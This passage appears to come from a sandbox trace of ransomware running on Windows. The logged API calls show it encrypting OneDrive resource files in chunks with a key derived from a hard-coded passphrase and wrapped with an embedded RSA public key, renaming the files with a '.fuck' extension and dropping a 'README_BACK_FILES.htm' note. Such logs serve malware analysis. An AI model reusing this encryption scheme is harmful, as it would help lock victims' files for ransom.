pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0279.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0279.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0279.167] CloseHandle (hObject=0x5d3c) returned 1 [0279.167] CloseHandle (hObject=0x5d48) returned 1 [0279.168] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.174] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.175] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.177] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.181] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.181] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.181] CryptReleaseContext (hProv=0x2f2d138, dwFlags=0x0) returned 1 [0279.181] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.181] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.181] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\readme_back_files.htm")) returned 0xffffffff [0279.182] AreFileApisANSI () returned 1 [0279.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0279.182] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.184] GetFileType (hFile=0x5d4c) returned 0x1 [0279.184] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.187] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.187] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.188] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.188] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.188] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.188] GetLastError () returned 0x0 [0279.188] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.188] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.189] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.189] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.191] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.192] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d9b8) returned 1 [0279.194] CryptCreateHash (in: hProv=0x2f2d9b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.194] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.194] CryptHashData (hHash=0x2fa748, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.194] CryptDeriveKey (in: hProv=0x2f2d9b8, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.194] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.194] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.194] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d028) returned 1 [0279.195] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d028, dwCertEncodingType=0x1, pInfo=0x2f36e20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36e50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36e58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fba48) returned 1 [0279.195] CryptEncrypt (in: hKey=0x2fba48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.195] CryptEncrypt (in: hKey=0x2fba48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2da40*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2da40*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2da40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2da40*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.196] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.206] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.207] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.208] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.208] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.208] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.208] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.208] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.208] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.209] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.209] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.209] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.209] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.216] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.217] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, 